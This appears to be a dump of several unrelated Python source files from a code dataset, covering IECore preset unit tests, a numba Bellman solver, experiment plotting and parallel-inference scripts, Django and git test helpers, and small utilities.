self.assertTrue( os.path.isfile( os.path.join( savePath, "basicPresetTest", "basicPresetTest-1.py" ) ) )
# save without the classLoader and check its there
preset.save( savePath, "basicPresetTest", classLoadable=False )
self.assertTrue( os.path.isfile( os.path.join( savePath, "basicPresetTest.cob" ) ) )
# reload
p = IECore.BasicPreset( os.path.join( savePath, "basicPresetTest.cob" ) )
self.assertTrue( p.applicableTo( testObj, testObj.parameters() ) )
self.assertFalse( p.applicableTo( testObj2, testObj2.parameters() ) )
testObj.parameters()["a"].setTypedValue( False )
testObj.parameters()["b"].setTypedValue( 0.0 )
p( testObj, testObj.parameters() )
self.assertEqual( testObj.parameters()["a"].getTypedValue(), True )
self.assertEqual( testObj.parameters()["b"].getTypedValue(), 1.0 )
preset2 = IECore.BasicPreset( testObj, testObj.parameters(), parameters=( testObj.parameters()["a"], ) )
preset2.save( savePath, "basicPresetTest2", classLoadable=False )
#reload
p2 = IECore.BasicPreset( os.path.join( savePath, "basicPresetTest2.cob" ) )
self.assertTrue( p2.applicableTo( testObj, testObj.parameters() ) )
self.assertTrue( p2.applicableTo( testObj2, testObj.parameters() ) )
p2( testObj2, testObj2.parameters() )
self.assertEqual( testObj2.parameters()["a"].getTypedValue(), True )
self.assertEqual( testObj2.parameters()["c"].getTypedValue(), 0.0 )
def testClassLoader( self ) :
testObj = IECore.Parameterised( "testParameterised1" )
testObj.parameters().addParameters(
[
IECore.BoolParameter( "a", "", True ),
IECore.FloatParameter( "b", "", 1.0 ),
]
)
savePath = os.path.abspath( os.path.join( os.path.dirname( __file__ ), "data", "basicPreset" ) )
preset = IECore.BasicPreset( testObj, testObj.parameters() )
preset.save( savePath, "basicPresetTestClassLoader" )
# make sure that no messages are emitted during loading
messageHandler = IECore.CapturingMessageHandler()
with messageHandler :
loader = IECore.ClassLoader( IECore.SearchPath( savePath ) )
p = loader.load( "basicPresetTestClassLoader" )()
self.assertEqual( len( messageHandler.messages ), 0 )
self.assertTrue( isinstance( p, IECore.BasicPreset ) )
p.metadata()
def testClasses( self ) :
testObj = IECore.Parameterised( "testParameterised1" )
testObj.parameters().addParameters(
[
IECore.BoolParameter( "a", "", True ),
IECore.ClassParameter( "b", "", "IECORE_OP_PATHS", os.path.join( "maths", "multiply" ), 2 ),
]
)
testObj2 = IECore.Parameterised( "testParameterised2" )
testObj2.parameters().addParameters(
[
IECore.ClassParameter( "c", "", "IECORE_OP_PATHS" ),
]
)
classes1 = testObj.parameters()["b"].getClass( True )
classes2 = testObj2.parameters()["c"].getClass( True )
self.assertNotEqual( classes1[1:], classes2[1:] )
p = IECore.BasicPreset( testObj, testObj.parameters()["b"] )
self.assertTrue( p.applicableTo( testObj, testObj.parameters()["b"] ) )
self.assertFalse( p.applicableTo( testObj, testObj.parameters() ) )
self.assertTrue( p.applicableTo( testObj2, testObj2.parameters()["c"] ) )
p( testObj2, testObj2.parameters()["c"] )
classes1 = testObj.parameters()["b"].getClass( True )
classes2 = testObj2.parameters()["c"].getClass( True )
self.assertEqual( classes1[1:], classes2[1:] )
def testClassVectors( self ) :
testObj = IECore.Parameterised( "testParameterised1" )
testObj.parameters().addParameters(
[
IECore.BoolParameter( "a", "", True ),
IECore.ClassVectorParameter( "b", "", "IECORE_OP_PATHS" ),
]
)
testObj.parameters()["b"].setClasses(
[
( "mult", os.path.join( "maths", "multiply" ), 2 ),
( "coIO", "compoundObjectInOut", 1 ),
]
)
testObj2 = IECore.Parameterised( "testParameterised2" )
testObj2.parameters().addParameters(
[
IECore.ClassVectorParameter( "c", "", "IECORE_OP_PATHS" ),
]
)
classes1 = [ c[1:] for c in testObj.parameters()["b"].getClasses( True ) ]
classes2 = [ c[1:] for c in testObj2.parameters()["c"].getClasses( True ) ]
self.assertNotEqual( classes1, classes2 )
p = IECore.BasicPreset( testObj, testObj.parameters()["b"] )
self.assertTrue( p.applicableTo( testObj, testObj.parameters()["b"] ) )
self.assertFalse( p.applicableTo( testObj, testObj.parameters() ) )
self.assertTrue( p.applicableTo( testObj2, testObj2.parameters()["c"] ) )
p( testObj2, testObj2.parameters()["c"] )
classes1 = [ c[1:] for c in testObj.parameters()["b"].getClasses( True ) ]
classes2 = [ c[1:] for c in testObj2.parameters()["c"].getClasses( True ) ]
self.assertEqual( classes1, classes2 )
def testCompoundVectorParameter( self ) :
p = IECore.Parameterised( "test" )
p.parameters().addParameters(
[
IECore.BoolParameter( "a", "", False ),
IECore.CompoundVectorParameter(
"c",
"",
members = [
IECore.StringVectorParameter( "s", "", IECore.StringVectorData() ),
IECore.BoolVectorParameter( "b", "", IECore.BoolVectorData() ),
]
)
]
)
p["c"]["s"].setValue( IECore.StringVectorData( [ "1", "2", "3" ] ) )
p["c"]["b"].setValue( IECore.BoolVectorData( [ True, False, True ] ) )
v = p.parameters().getValue().copy()
preset = IECore.BasicPreset( p, p.parameters() )
self.assertTrue( preset.applicableTo( p, p.parameters() ) )
p.parameters().setValue( p.parameters().defaultValue )
self.assertNotEqual( p.parameters().getValue(), v )
preset( p, p.parameters() )
self.assertEqual( p.parameters().getValue(), v )
def tearDown( self ) :
savePath = os.path.abspath( os.path.join( os.path.dirname( __file__ ), "data", "basicPreset" ) )
paths = (
os.path.join( savePath, "basicPresetTest" ),
os.path.join( savePath, "basicPresetTest.cob" ),
os.path.join( savePath, "basicPresetTest2.cob" ),
os.path.join( savePath, "basicPresetTestClassLoader" ),
)
for p in paths :
if os.path.isdir( p ) :
shutil.rmtree( p )
elif os.path.isfile( p ) :
os.remove( p )
if __name__ == "__main__":
unittest.main()
| StarcoderdataPython |
111987 | import numpy as np
from numba import njit, prange
# consav
from consav import linear_interp # for linear interpolation
from consav import golden_section_search # for optimization in 1D
# local modules
import utility
# a. define objective function
@njit
def obj_bellman(c,m,interp_w,par):
""" evaluate bellman equation """
# a. end-of-period assets
a = m-c
# b. continuation value
w = linear_interp.interp_1d(par.grid_a,interp_w,a)
# c. total value
value_of_choice = utility.func(c,par) + w
return -value_of_choice # we are minimizing
# b. solve bellman equation
@njit(parallel=True)
def solve_bellman(t,sol,par):
"""solve bellman equation using nvfi"""
# unpack (this helps numba optimize)
v = sol.v[t]
c = sol.c[t]
# loop over outer states
for ip in prange(par.Np): # in parallel
# loop over cash-on-hand
for im in range(par.Nm):
# a. cash-on-hand
m = par.grid_m[im]
# b. optimal choice
c_low = np.fmin(m/2,1e-8)
c_high = m
c[ip,im] = golden_section_search.optimizer(obj_bellman,c_low,c_high,args=(m,sol.w[ip],par),tol=par.tol)
# note: the above finds the minimum of obj_bellman in range [c_low,c_high] with a tolerance of par.tol
# and arguments (except for c) as specified
# c. optimal value
v[ip,im] = -obj_bellman(c[ip,im],m,sol.w[ip],par)
| StarcoderdataPython |
170126 | <gh_stars>1-10
"""
Plot accuracy:
python analyze_result.py $path_to_MMI $path_to_peek $path_to_random -l MMI peek random
Plot gain over random:
python analyze_result.py $path_to_MMI $path_to_peek $path_to_random -l MMI peek random --gain-over-random
"""
import argparse
import glob
import numpy as np
import os
import pylab
import subprocess
pylab.rcParams['font.size']=20
colors=['r', 'g', 'b', 'c', 'm', 'y', 'k']
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument('log_dirs', nargs='+', help='one or multiple dirs, '
'each contains logs that corresponds to a '
'ckpt selection method')
parser.add_argument('-l', '--label', nargs='+',
help='label for each dir')
parser.add_argument('--gain-over-random', action='store_true',
help='plot the gain of each non-random method '
'against random')
parser.add_argument('-s', help='path to save the figure. If not given, '
'will show the figure')
return parser.parse_args()
def grep_result(log_dir):
"""
Return a numpy array of validation accuracies for all log files under
the dir. The logs are due to a certain selection methods of checkpoints.
They are named as selection_k${k_ckpts}_t${task_id}
Suppose there are T tasks, and we select up to K checkpoints.
If random selection with R different random seeds, the returned is
R x T x K array
If other (determnistic) method, the returned is
T x K array
"""
fs = glob.glob(os.path.join(log_dir, '*_k[1-9]*_t[0-9]*.out'))
fs = [f.split('/')[-1] for f in fs]
K = max([int(f.split('.')[0].split('_')[1][1:]) for f in fs])
T = max([int(f.split('.')[0].split('_')[2][1:]) for f in fs]) + 1
is_random_selection = 'seed' in fs[0]
if is_random_selection:
seeds = [int(f.split('_')[0][4:]) for f in fs]
seeds = np.unique(seeds)
R = len(seeds)
Results = np.zeros((R, T, K))
for i, s in enumerate(seeds):
for t in range(T):
for k in range(1, K+1):
fname = os.path.join(log_dir,
'seed{}_k{}_t{}.out'.format(s, k, t))
acc = float(
subprocess.check_output(
['./get_acc.sh', fname]).decode('utf-8')\
.strip()) * 100
Results[i, t, k-1] = acc
else:
method=fs[0].split('_')[0]
Results = np.zeros((T, K))
for t in range(T):
for k in range(1, K+1):
fname = os.path.join(log_dir,
'{}_k{}_t{}.out'.format(method, k, t))
acc = float(
subprocess.check_output(['./get_acc.sh', fname])\
.decode('utf-8').strip()) * 100
Results[t, k-1] = acc
return Results
def plot_results(Results, label, color):
if len(Results.shape) == 3:
# random baseline
R, T, K = Results.shape
task_average = np.mean(Results, axis=1)
q_lower = np.quantile(task_average, 0.05, axis=0)
q_upper = np.quantile(task_average, 0.95, axis=0)
pylab.fill_between(range(1, K+1), q_lower, q_upper,
alpha=0.2, label=label, color=color)
else: # deterministic selection method
T, K = Results.shape
task_average = np.mean(Results, axis=0)
pylab.plot(range(1, K+1), task_average, label=label, color=color)
def plot_gains(result, random_result, label, color):
random_mean = random_result.mean(axis=0) # marginalize over random seed
gain_each_task = result - random_mean
gain = gain_each_task.mean(axis=0)
pylab.plot(range(1, len(gain)+1), gain, label=label, color=color)
if __name__ == '__main__':
args = parse_args()
if args.label:
assert len(args.label) == len(args.log_dirs)
label = args.label
else:
label = [str(_) for _ in range(1, len(args.log_dirs)+1)]
if args.gain_over_random:
Results = []
for i, d in enumerate(args.log_dirs):
Result = grep_result(d)
if len(Result.shape) == 3:
random_index = i
random_result = Result
else:
Results.append(Result)
for i, result in enumerate(Results):
plot_gains(result, random_result, label[i], colors[i])
pylab.hlines(0, 1, random_result.shape[-1],
colors[random_index], 'dashed', label='random')
#pylab.ylabel(r'$\mathbb{E}_t[acc_t - acc_t^r]$ (%)')
pylab.ylabel('gain over random (%)')
else:
for i, d in enumerate(args.log_dirs):
Results = grep_result(d)
plot_results(Results, label[i], colors[i])
pylab.ylabel(r'$\mathbb{E}_t acc_t$ (%)')
pylab.xlabel('k checkpoints used')
pylab.xticks(range(0, 21, 5), [str(_) for _ in range(0, 21, 5)])
pylab.legend()
pylab.tight_layout()
if args.s:
pylab.savefig(args.s)
else:
pylab.show()
| StarcoderdataPython |
1646434 | <reponame>microsoft/poultry-cafos
"""
Copyright (c) Microsoft Corporation. All rights reserved.
Licensed under the MIT License.
Script for running an inference script in parallel over a list of inputs.
We split the actual list of filenames we want to run on into NUM_GPUS different batches,
save those batches to file, and call `inference.py` multiple times in parallel - pointing
it to a different batch each time.
"""
import subprocess
from multiprocessing import Process
import numpy as np
# list of GPU IDs that we want to use, one job will be started for every ID in the list
GPUS = [0, 0, 1, 1]
TEST_MODE = False  # if True then only print the commands, if False then print and run them
# path passed to `--model_fn` in the `inference.py` script
MODEL_FN = "output/train-all_unet_0.5_0.01_rotation_best-checkpoint.pt"
# path passed to `--output_dir` in the `inference.py` script
OUTPUT_DIR = "output/chesapeake-bay-3-18-2021/inference/"
# Get the list of files we want our model to run on
with open("data/naip_chesapeake_bay_2017-2018.csv", "r") as f:
fns = f.read().strip().split("\n")[1:]
# Split the list of files up into approximately equal sized batches based on the number
# of GPUs we want to use. Each worker will then work on NUM_FILES / NUM_GPUS files in
# parallel. Save these batches of the original list to disk (as a simple list of files
# to be consumed by the `inference.py` script)
num_files = len(fns)
num_splits = len(GPUS)
num_files_per_split = np.ceil(num_files / num_splits)
output_fns = []
for split_idx in range(num_splits):
output_fn = "data/runs/chesapeake-bay-3-18-2021_split_%d.csv" % (split_idx)
with open(output_fn, "w") as f:
start_range = int(split_idx * num_files_per_split)
end_range = min(num_files, int((split_idx + 1) * num_files_per_split))
print("Split %d: %d files" % (split_idx + 1, end_range - start_range))
f.write("image_fn\n")
for i in range(start_range, end_range):
end = "" if i == end_range - 1 else "\n"
f.write("%s%s" % (fns[i], end))
output_fns.append(output_fn)
# Start NUM_GPUS worker processes, each pointed to one of the lists of files we saved
# to disk in the previous step.
def do_work(fn, gpu_idx):
    command = (f"python inference.py --input_fn {fn} --model_fn {MODEL_FN}"
               f" --output_dir {OUTPUT_DIR} --gpu {gpu_idx} --save_soft")
print(command)
if not TEST_MODE:
subprocess.call(command, shell=True)
processes = []
for work, gpu_idx in zip(output_fns, GPUS):
p = Process(target=do_work, args=(work, gpu_idx))
processes.append(p)
p.start()
for p in processes:
p.join()
| StarcoderdataPython |
1640193 | def rotate_to_first_in_deque_and_pop(input_deque, predicate):
"""
Finds the first item in the deque that satisfies the condition by rotating through the deque using popleft().
Faster than doing a sort on the deque.
"""
for _ in xrange(0, len(input_deque)):
item = input_deque.popleft()
if predicate(item):
return item
input_deque.append(item) # Move the item to the end
return None
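# Example usage sketch (hypothetical values): pop the first even number while
# keeping the relative order of the items that were skipped past.
#
#   d = deque([1, 3, 4, 5, 6])
#   item = rotate_to_first_in_deque_and_pop(d, lambda x: x % 2 == 0)
#   # item == 4; d is now deque([5, 6, 1, 3]) because the skipped items were rotated to the end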
def pop_first_from_list_or_end(input_list, predicate):
for i in xrange(len(input_list)-1, -1, -1):
if predicate(input_list[i]):
return input_list.pop(i)
return input_list.pop()
def count_if(input_list, predicate):
c = 0
for item in input_list:
if predicate(item):
c += 1
return c
def convert_dictionary(d, keyConverter, valueConverter):
new_dict = {}
for key, value in d.iteritems():
new_dict[keyConverter(key) if keyConverter else key] = valueConverter(value) if valueConverter else value
return new_dict
| StarcoderdataPython |
68555 | from abc import ABC, abstractmethod
class AbstractDisplayService(ABC):
@abstractmethod
def accept_items(self, items):
raise Exception("Not implemented.")
@abstractmethod
def stop(self):
raise Exception("Not implemented.")
| StarcoderdataPython |
1716137 | <gh_stars>0
def countWord(filename, word):
line_count = 0
word_count = 0
with open(filename) as f:
content = f.read()
for line in content.splitlines():
found = line.count(word)
if found:
line_count += 1
word_count += found
return (line_count, word_count)
def countNumber(filename, number):
line_count = 0
word_count = 0
with open(filename) as f:
content = f.read()
for line in content.splitlines():
found = line.count(str(number))
if found:
line_count += 1
word_count += found
return (line_count, word_count)
'''
Copy-paste! Having the same or almost the same code in multiple places
in project increases amount of code to maintain with no good reason.
Above toy example sounds silly, but copy-pastes are harder to find
if they exist as private implementation details scattered throughout repository,
or repetitive boilerplate code in various places in repository.
Or if they are a deeply buried part of large function or class,
inaccessible to potential users.
'''
def countWord(filename, word):
line_count = 0
word_count = 0
with open(filename) as f:
content = f.read()
for line in content.splitlines():
found = line.count(word)
if found:
line_count += 1
word_count += found
return (line_count, word_count)
def countNumber(filename, number):
return countWord(filename, str(number))
def countWord(filename, word):
line_count = 0
word_count = 0
with open(filename) as f:
content = f.read()
for line in content.splitlines():
found = line.count(word)
if found:
line_count += 1
word_count += found
return (line_count, word_count)
def wordCount(filename, word):
def add(acc, line):
words, lines = acc
found = line.count(word)
return words + found, lines + bool(found)
with open(filename) as f:
return reduce(add, f.readlines(), (0, 0))
'''
This is a less trivial example. Both functions do exactly the same thing,
but the language features used are different. Imagine these are in different
places in codebase, with different identifier names. No automatic tool for
finding code duplication is going to find this kind of superfluous code.
Two ways of coping with them would be:
- separation of concerns: solve different problems in different places,
so that you know where to look for building blocks when you have
particular problem. As long as similar logic is in the same place,
it's easier to spot reocurring patterns,
- code review: someone may spot you're reinventing the wheel (or doing
old thing better!), which may result in ending up with only with
solution for given problem - the best of the two
I pick reduce variant. Seems shorter to me.
'''
def countWord(filename, word):
def add(acc, line):
words, lines = acc
found = line.count(word)
return words + found, lines + bool(found)
with open(filename) as f:
return reduce(add, f.readlines(), (0, 0))
| StarcoderdataPython |
1624910 |
import arcade
import math
from miscellaneous import Misc
import Constants
class Arrow:
def __init__(self, x1, y1, x2, y2, x3, y3, color):
self.x1 = x1
self.y1 = y1
self.x2 = x2
self.y2 = y2
self.x3 = x3
self.y3 = y3
self.color = color
def draw(self):
arcade.draw_triangle_filled(self.x1, self.y1, self.x2, self.y2, self.x3, self.y3, self.color)
def update(self,x,y):
self.x1 = x
self.y1 =y
intersections = Misc.circle_intersection(self,(Constants.SCREEN_X/2, Constants.SCREEN_Y/2, Constants.CIRCLE_RADIUS),
(x,y,math.sqrt(pow(x-Constants.SCREEN_X/2,2)+ pow(y-Constants.SCREEN_Y/2,2)- pow(Constants.CIRCLE_RADIUS,2))))
self.x2 = intersections[0]
self.y2= intersections[1]
self.x3 = intersections[2]
self.y3 = intersections[3]
| StarcoderdataPython |
3253593 | <reponame>phungj/MSOE_Comp_Prog_Py
import os
file_path = os.path.join(os.path.dirname(__file__), "sanitized_input.txt")
with open(file_path, 'r') as input:
all_lines = input.readlines()
for i in range(len(all_lines)):
all_lines[i] = all_lines[i].strip("\n")
fields = []
field_ranges = []
index = 0
current_line = all_lines[index]
while not current_line == "":
colon_index = current_line.index(":")
split_current_line = current_line[colon_index + 2:].split(" ")
fields.append(current_line[:colon_index])
field_ranges.append((split_current_line[0], split_current_line[2]))
index += 1
current_line = all_lines[index]
ranges = []
temp_tuple = ()
for field in field_ranges:
temp_tuple = ()
for interval in field:
split_field = interval.split("-")
split_field = [int(s) for s in split_field]
temp_tuple += (range(split_field[0], split_field[1] + 1),)
ranges.append(temp_tuple)
index += 2
your_ticket = all_lines[index]
index += 3
current_line = all_lines[index]
tickets = [your_ticket]
while not current_line == "" and index < 220:
tickets.append(current_line)
index += 1
current_line = all_lines[index]
tickets = [i.split(",") for i in tickets]
indexed_fields = {f: [] for f in range(len(tickets[0]))}
while tickets[0]:
for ticket in tickets:
for i in range(len(ticket)):
indexed_fields.get(i).append(ticket.pop(0))
field_dict = {f: -1 for f in fields}
broken = False
# while fields:
# TODO: Continue here | StarcoderdataPython |
3268613 | '''
@author: <NAME>
@summary: Test cases to make sure sequential execution and process based concurrent execution return
the same response.
'''
from tests.test_concurrency_base import TestBaseConcurrency
from batch_requests.concurrent.executor import ProcessBasedExecutor
class TestProcessConcurrency(TestBaseConcurrency):
'''
Tests sequential and concurrent process based execution.
'''
def get_executor(self):
'''
Returns the executor to use for running tests defined in this suite.
'''
return ProcessBasedExecutor(self.number_workers)
def test_thread_concurrency_response(self):
'''
Make a request with sequential and process based concurrent executor and compare
the response.
'''
self.compare_seq_and_concurrent_req()
def test_duration(self):
'''
Compare that running tests with ProcessBasedConcurreny return faster than running
them sequentially.
'''
self.compare_seq_concurrent_duration()
| StarcoderdataPython |
1703891 | <filename>models/DeepFill_Models/unfold_test.py
import torch
import numpy as np
in_a = np.arange(16)
in_a = np.resize(in_a, (4,4))
in_tensor = np.expand_dims(in_a, 0)
in_tensor = np.expand_dims(in_tensor, 0)
print("input: ")
print(in_tensor)
in_t = torch.from_numpy(in_tensor)
all_patches = in_t.unfold(2, 2, 1).unfold(3, 2, 1)
print("all patches")
print(all_patches[0][0][0][1])
print(all_patches.shape) | StarcoderdataPython |
3224296 | #!/usr/bin/env python3
import requests, json
domain = input("Enter the hostname http://")
response = requests.get("http://"+domain)
print(response.json)
print("Status code: "+str(response.status_code))
print("Headers response: ")
for header, value in response.headers.items():
print(header, '-->', value)
print("Headers request : ")
for header, value in response.request.headers.items():
print(header, '-->', value)
| StarcoderdataPython |
4834901 | <reponame>Yuanoung/djg-master
#!/usr/bin/env python
import os, sys, traceback
import unittest
import django.contrib as contrib
try:
set
except NameError:
from sets import Set as set # For Python 2.3
CONTRIB_DIR_NAME = 'django.contrib'
MODEL_TESTS_DIR_NAME = 'modeltests'
REGRESSION_TESTS_DIR_NAME = 'regressiontests'
TEST_TEMPLATE_DIR = 'templates'
CONTRIB_DIR = os.path.dirname(contrib.__file__)
MODEL_TEST_DIR = os.path.join(os.path.dirname(__file__), MODEL_TESTS_DIR_NAME)
REGRESSION_TEST_DIR = os.path.join(os.path.dirname(__file__), REGRESSION_TESTS_DIR_NAME)
ALWAYS_INSTALLED_APPS = [
'django.contrib.contenttypes',
'django.contrib.auth',
'django.contrib.sites',
'django.contrib.flatpages',
'django.contrib.redirects',
'django.contrib.sessions',
'django.contrib.comments',
'django.contrib.admin',
]
def get_test_models():
models = []
for loc, dirpath in (MODEL_TESTS_DIR_NAME, MODEL_TEST_DIR), (REGRESSION_TESTS_DIR_NAME, REGRESSION_TEST_DIR), (CONTRIB_DIR_NAME, CONTRIB_DIR):
for f in os.listdir(dirpath):
if f.startswith('__init__') or f.startswith('.') or f.startswith('sql') or f.startswith('invalid'):
continue
models.append((loc, f))
return models
def get_invalid_models():
models = []
for loc, dirpath in (MODEL_TESTS_DIR_NAME, MODEL_TEST_DIR), (REGRESSION_TESTS_DIR_NAME, REGRESSION_TEST_DIR), (CONTRIB_DIR_NAME, CONTRIB_DIR):
for f in os.listdir(dirpath):
if f.startswith('__init__') or f.startswith('.') or f.startswith('sql'):
continue
if f.startswith('invalid'):
models.append((loc, f))
return models
class InvalidModelTestCase(unittest.TestCase):
def __init__(self, model_label):
unittest.TestCase.__init__(self)
self.model_label = model_label
def runTest(self):
from django.core.management.validation import get_validation_errors
from django.db.models.loading import load_app
from cStringIO import StringIO
try:
module = load_app(self.model_label)
except Exception, e:
self.fail('Unable to load invalid model module')
# Make sure sys.stdout is not a tty so that we get errors without
# coloring attached (makes matching the results easier). We restore
        # sys.stdout afterwards.
orig_stdout = sys.stdout
s = StringIO()
sys.stdout = s
count = get_validation_errors(s, module)
sys.stdout = orig_stdout
s.seek(0)
error_log = s.read()
actual = error_log.split('\n')
expected = module.model_errors.split('\n')
unexpected = [err for err in actual if err not in expected]
missing = [err for err in expected if err not in actual]
self.assert_(not unexpected, "Unexpected Errors: " + '\n'.join(unexpected))
self.assert_(not missing, "Missing Errors: " + '\n'.join(missing))
def django_tests(verbosity, interactive, test_labels):
from django.conf import settings
old_installed_apps = settings.INSTALLED_APPS
old_test_database_name = settings.TEST_DATABASE_NAME
old_root_urlconf = getattr(settings, "ROOT_URLCONF", "")
old_template_dirs = settings.TEMPLATE_DIRS
old_use_i18n = settings.USE_I18N
old_login_url = settings.LOGIN_URL
old_language_code = settings.LANGUAGE_CODE
old_middleware_classes = settings.MIDDLEWARE_CLASSES
# Redirect some settings for the duration of these tests.
settings.INSTALLED_APPS = ALWAYS_INSTALLED_APPS
settings.ROOT_URLCONF = 'urls'
settings.TEMPLATE_DIRS = (os.path.join(os.path.dirname(__file__), TEST_TEMPLATE_DIR),)
settings.USE_I18N = True
settings.LANGUAGE_CODE = 'en'
settings.LOGIN_URL = '/accounts/login/'
settings.MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.middleware.common.CommonMiddleware',
)
settings.SITE_ID = 1
# Load all the ALWAYS_INSTALLED_APPS.
# (This import statement is intentionally delayed until after we
# access settings because of the USE_I18N dependency.)
from django.db.models.loading import get_apps, load_app
get_apps()
# Load all the test model apps.
for model_dir, model_name in get_test_models():
model_label = '.'.join([model_dir, model_name])
try:
# if the model was named on the command line, or
# no models were named (i.e., run all), import
# this model and add it to the list to test.
if not test_labels or model_name in set([label.split('.')[0] for label in test_labels]):
if verbosity >= 1:
print "Importing model %s" % model_name
mod = load_app(model_label)
if mod:
if model_label not in settings.INSTALLED_APPS:
settings.INSTALLED_APPS.append(model_label)
except Exception, e:
sys.stderr.write("Error while importing %s:" % model_name + ''.join(traceback.format_exception(*sys.exc_info())[1:]))
continue
# Add tests for invalid models.
extra_tests = []
for model_dir, model_name in get_invalid_models():
model_label = '.'.join([model_dir, model_name])
if not test_labels or model_name in test_labels:
extra_tests.append(InvalidModelTestCase(model_label))
try:
# Invalid models are not working apps, so we cannot pass them into
# the test runner with the other test_labels
test_labels.remove(model_name)
except ValueError:
pass
# Run the test suite, including the extra validation tests.
from django.test.simple import run_tests
failures = run_tests(test_labels, verbosity=verbosity, interactive=interactive, extra_tests=extra_tests)
if failures:
sys.exit(failures)
# Restore the old settings.
settings.INSTALLED_APPS = old_installed_apps
settings.ROOT_URLCONF = old_root_urlconf
settings.TEMPLATE_DIRS = old_template_dirs
settings.USE_I18N = old_use_i18n
settings.LANGUAGE_CODE = old_language_code
settings.LOGIN_URL = old_login_url
settings.MIDDLEWARE_CLASSES = old_middleware_classes
if __name__ == "__main__":
from optparse import OptionParser
usage = "%prog [options] [model model model ...]"
parser = OptionParser(usage=usage)
parser.add_option('-v','--verbosity', action='store', dest='verbosity', default='0',
type='choice', choices=['0', '1', '2'],
help='Verbosity level; 0=minimal output, 1=normal output, 2=all output')
parser.add_option('--noinput', action='store_false', dest='interactive', default=True,
help='Tells Django to NOT prompt the user for input of any kind.')
parser.add_option('--settings',
help='Python path to settings module, e.g. "myproject.settings". If this isn\'t provided, the DJANGO_SETTINGS_MODULE environment variable will be used.')
options, args = parser.parse_args()
if options.settings:
os.environ['DJANGO_SETTINGS_MODULE'] = options.settings
elif "DJANGO_SETTINGS_MODULE" not in os.environ:
parser.error("DJANGO_SETTINGS_MODULE is not set in the environment. "
"Set it or use --settings.")
django_tests(int(options.verbosity), options.interactive, args)
| StarcoderdataPython |
1695526 | <gh_stars>1-10
import os
import subprocess
import pytest
from . import util
class Git:
def __init__(self, repo_dir):
super().__init__()
self.repo_dir = repo_dir
self._run_git('init', self.repo_dir)
        # If GPG signing is enabled, committing fails because there are no
        # GPG keys for the test email addresses used here.
self._run_git('config', 'commit.gpgsign', 'false')
def get_local_version_string(self):
return self._get_head_sha()[:10]
def create_commit(self):
with open(os.path.join(self.repo_dir, 'dummy.txt'), 'at+') as dummy_file:
dummy_file.seek(0)
change_number = len(dummy_file.read().split('\n'))
dummy_file.write('Dummy change {}\n'.format(change_number))
self._run_git('add', 'dummy.txt')
self._run_git('commit', '-m', 'Dummy change {}'.format(change_number))
def create_tag(self, tag_name):
self._run_git(
'tag',
'-a',
'-m', 'Tag {}'.format(tag_name),
tag_name,
'HEAD',
)
def _get_head_sha(self):
return self._run_git(
'rev-parse', 'HEAD',
stdout=subprocess.PIPE,
).stdout.decode().strip()
def _run_git(self, *args, **kwargs):
kwargs['cwd'] = self.repo_dir
kwargs['check'] = True
environ = kwargs.get('env') or os.environ.copy()
environ['GIT_AUTHOR_NAME'] = 'Setuptools Vcsver Test'
environ['GIT_AUTHOR_EMAIL'] = '<EMAIL>'
environ['GIT_COMMITTER_NAME'] = 'Setuptools Vcsver Test'
environ['GIT_COMMITTER_EMAIL'] = '<EMAIL>'
kwargs['env'] = environ
return util.run('git', *args, **kwargs)
def test_get_version_defined_in_setup_py(test_project):
test_project.set_setup_kwargs(version='2.0')
test_project.assert_current_version('2.0')
vcs = Git(test_project.path)
vcs.create_commit()
vcs.create_commit()
test_project.assert_current_version('2.0')
vcs.create_tag('1.0')
test_project.assert_current_version('2.0')
test_project.set_setup_kwargs(version='2.1')
test_project.assert_current_version('2.1')
@pytest.mark.parametrize(
('setuptools_kwargs', 'dev_version_format_string'),
(
(None, '{tag}.post{dist}+{hash}'),
({'vcsver': {'create_version': 'pep440.post'}}, '{tag}.post{dist}+{hash}'),
({'vcsver': {'create_version': 'pep440.post_with_dev'}}, '{tag}.post0.dev{dist}+{hash}'),
),
)
def test_get_version_from_history(
test_project,
setuptools_kwargs,
dev_version_format_string,
):
if setuptools_kwargs:
test_project.set_setup_kwargs(**setuptools_kwargs)
vcs = Git(test_project.path)
test_project.assert_current_version('{}+dirty'.format(test_project.root_version))
vcs.create_commit()
test_project.assert_current_version(
dev_version_format_string.format(
tag=test_project.root_version,
dist=1,
hash=vcs.get_local_version_string(),
),
)
vcs.create_commit()
vcs.create_commit()
test_project.assert_current_version(
dev_version_format_string.format(
tag=test_project.root_version,
dist=3,
hash=vcs.get_local_version_string(),
),
)
vcs.create_tag('1.0')
test_project.assert_current_version('1.0')
vcs.create_commit()
vcs.create_commit()
test_project.assert_current_version(
dev_version_format_string.format(
tag='1.0',
dist=2,
hash=vcs.get_local_version_string(),
),
)
vcs.create_commit()
vcs.create_commit()
test_project.assert_current_version(
dev_version_format_string.format(
tag='1.0',
dist=4,
hash=vcs.get_local_version_string(),
),
)
def test_configuration_having_version_defined_in_setup_py_and_vcsver_enabled(test_project):
vcs = Git(test_project.path)
test_project.set_setup_kwargs(version='5.0', vcsver=True)
vcs.create_commit()
vcs.create_tag('6.0')
test_project.assert_current_version('6.0')
| StarcoderdataPython |
3292071 | text = '[ Статистика ]<br>Система:<br> Процессор:<br>'
for idx, cpu in enumerate(psutil.cpu_percent(interval=1, percpu=True)):
text += '  Ядро №'+str(idx+1)+': '+str(cpu)+'%<br>'
text += '  Температура: '+str(int(open('/sys/class/thermal/thermal_zone0/temp','r').read())/1000)+' °С\n'
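# RAM section: psutil byte counts converted to megabytes for the report.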
mem = psutil.virtual_memory()
MB = 1024 * 1024
text += ' ОЗУ:<br>  Всего: '+str(int(mem.total / MB))+'MB<br>  Использовано: '+str(int((mem.total - mem.available) / MB))+'MB<br>  Свободно: '+str(int(mem.available / MB))+'MB<br>  Использовано ботом: '+str(int(psutil.Process().memory_info().vms / MB))+'MB<br> '
end_time = time.monotonic()
text += 'Бот:<br>  Время работы: '+str(datetime.timedelta(seconds=end_time - start_time))
text += '\n  Обращений: '+str(uses_kb)
apisay(text,pack['toho'])
| StarcoderdataPython |
3319969 | #!/usr/bin/env python
#
# MagicaVoxel2MinecraftPi
#
from voxel_util import create_voxel, post_to_chat, ply_to_positions, reset_area
from magicavoxel_axis import axis
from all_clear import clear
from time import sleep
# polygon file format exported from MagicaVoxel
